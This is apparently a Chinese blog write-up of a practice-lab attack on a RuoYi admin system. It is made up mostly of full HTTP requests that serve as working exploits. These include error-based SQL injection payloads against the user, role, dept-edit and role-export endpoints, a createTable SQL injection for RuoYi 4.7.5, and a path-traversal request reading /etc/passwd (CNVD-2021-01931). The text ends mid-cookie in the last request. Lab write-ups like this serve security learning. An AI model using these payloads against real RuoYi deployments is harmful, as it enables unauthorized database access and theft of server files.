本文最后更新于 324 天前,其中的信息可能已经有所发展或是发生改变。
靶场地址:http://wba2x0kpf.lab.aqlab.cn/login
打开靶场:
使用弱口令登入
若依前台默认shiro key命令执行漏洞,无果
后台SQL注入,”用户管理“,”角色管理“,功能处都存在SQL注入
1.第一个注入点
用户管理处POC:
POST /system/user/list HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/user
Cookie: JSESSIONID=1c937ad8-81bf-4af8-8271-9dcf0adccf05; rememberMe=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
pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
2.第二个注入点:
角色管理处POC
POST /system/role/list HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/role
Cookie: JSESSIONID=1c937ad8-81bf-4af8-8271-9dcf0adccf05; rememberMe=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
pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
3.第三个注入点
角色编辑接口:
POST /system/dept/edit HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/post
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=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
DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#
4.第四个注入点
角色导出接口:
POST /system/role/export HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://wba2x0kpf.lab.aqlab.cn
Authorization: Basic emthcTp6a2Fx
Connection: close
Referer: http://wba2x0kpf.lab.aqlab.cn/system/post
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=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
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
RuoYi4.7.5版本后台sql注入
ruoyi-4.7.5 后台 com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入。
POC:
sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));但是我尝试的这个靶场并没有成功,或许是没有
若依后台任意文件读取(CNVD-2021-01931)
影响版本:RuoYi<4.5.1
POC:
GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1
Host: wba2x0kpf.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic emthcTp6a2Fx
Connection: close
Cookie: JSESSIONID=12402b41-742c-4f59-bb79-ec4d34dbc971; rememberMe=F7cRP++5PSxpejBle6CL05ZD10GcXlgt1FEmpf2GcUFF8/A+C67GNFUOORDwpngiirkSDzy9s8uK5L+sMv6tt7CZeb5L/rQTWHu26TMl0yvOdlUZRXCdMdLy3LNhpEqINBrUpmNgSxPw5YgOuxQ3nn/yWluYYH6JvLyrDFvx1HHIz8Td/45jmV0bv8OmgB6+EWHvidijjN3fiU+9H62/h7Q343cwBb1G3pwSZ7HKCwZe66A2/qAiDTBxBOcXZgxJyJBit/lUZAiTXH5qrGidtoSq1GfFu/mRhdJum2iY6Yiz+da+4tVAY2ylkIdYFuzMi6MrcE/h1PVBEszDxMc+M7CCjc3Mrlm23XSDCKHWcEBtoli83yLHaTKaaXB+DxubgK42aLOaVpvAzGus0++T0DfGVRI4IBhc6lYO7JkngIxzaiFmgbQ0e5lCRZTZJYtFwB1F/TcaJjtcOAap+IF7txVdIIgUlRRRzAdQTCWcay/8Pkg8Mn7lDVLXN52gwC1yeGzet1yKoxUOfzEEgJtb0D+oR5r1UTiLQ0ZmDBWfYc3r9OKUG/FLquuoe2LydY/R/OyO6ExmYZ2OMr53VL6oIdM1GKKJbC0i9o16zH31F9s9EWvrodVbVJQxgYUdyTUMiTfpbRDB5gS2b/SCXszlhcnsGF6r22uCDoHXN5YAY6DZxDQXFu5sL/Y42YjTjNa6Eixa2N7ykiO0KCnLg9pJ7eJT4PKqdG4b0kvo6glFv3iRsOVbFwrJXLIlR5O1sJWYWKBLkdEfMPjUjD3R06IBmmWKXS3Hm/p61GIxFXo0CrP97eT4ygwjImQg6Pbe5/F9d4zi5Muts4skVoTIf9xZJMxrRJMobb+59ENm/5Hf3c4cbGc4qYEAHPVOcfAd4oBLk0Psze9g6eu2oMVfP+rmA7oZyrmWBWwKRB3g4xSan9y7yU9Hmzmmrdi0Gq6XF+d2GOV5JSKwo4/Aoe0fsCX2lEBYoYz0Vu9NYKDqWKwMnaeiQ5I09Q0dw+RNKrGyv1gJD+QQfJrgSk4Q2er+FjcpJGRXx3QZnb7DSWxwzT+6qhuRW3jwXOJMY2oFL04Ju399BWrpbGaW7hoNHYTTY4q2NnxzDYQdc+pLpVAttocFya1EZ8zzQQdPT0dKMdluJ9mk/cxDMDCSi9rP6jp3mTn025qtU7ERQnqtA4j3Y4pZG9wSUgAYfAxAw4oHhR4AgB+Gz/GOwU6O0gUMolAp1kYjtw4jNh13UWnb/rfFxfXs8jjwLnWQRBNJw2O+HN0Oa7PzwPfQVO8Rq0oYXbIMMo4F14tCoWCSGBPdTkKfQgYM+B3Z9zYj8QjrX6CzH/n5+auFAzRz2WhLm5+QObywFKxEpmDBDgVQ/SyVLn2ijlXbNhc9smowcKSZT2GruElstD7yIQV+d0YaqIp/j3dizLs9EU5Fg2cfzRFMowOuUULvw/qmwfmfwa1Duc/uJXRE2/MpWPBgLSPDmyAVKqbNJiAIE+wtQJJiGCDBQBAezVEswf8cDBCyK13piY1xlu7xT+EmMUsEz0yEy5dN8Ow6x0A3tLttNRB9J+eiUmfiWXRIbIaPwaKABvaDjFMB72EhpaeDX6QDoSrEFjbzZzr23krletHz2ckRHh7v6fqpj6TZwtnBH0VYydLI9JdDD64BMcdvTNJQKowINyYmUC0+rv/hmYdvUWho46Hqg12cML2gpPu5p2UExmJiX3xnQaZV2yzcygUzUvPhGel5fB6G8WaJwd3BSTRvZOAqOPTx0suIbpauNx+UnF+pDl35rj9tGuzyKXj6bImJgBScoi7xkF8tEBINuOheG9MX1krkFQ5sekRTywtdkKJxUK2+9PNNw2n3xYpX4uyQ+wpKzCFCYoOFqlbgcIzW4TJjDC62C69P7bSHR5MplDFhwA1N+a5hZPoUqdp/QenXSqiBoxxGDRbr7ebVAQV9X6VE9Og7tMduaC5Z8mgElni+aCNiAAz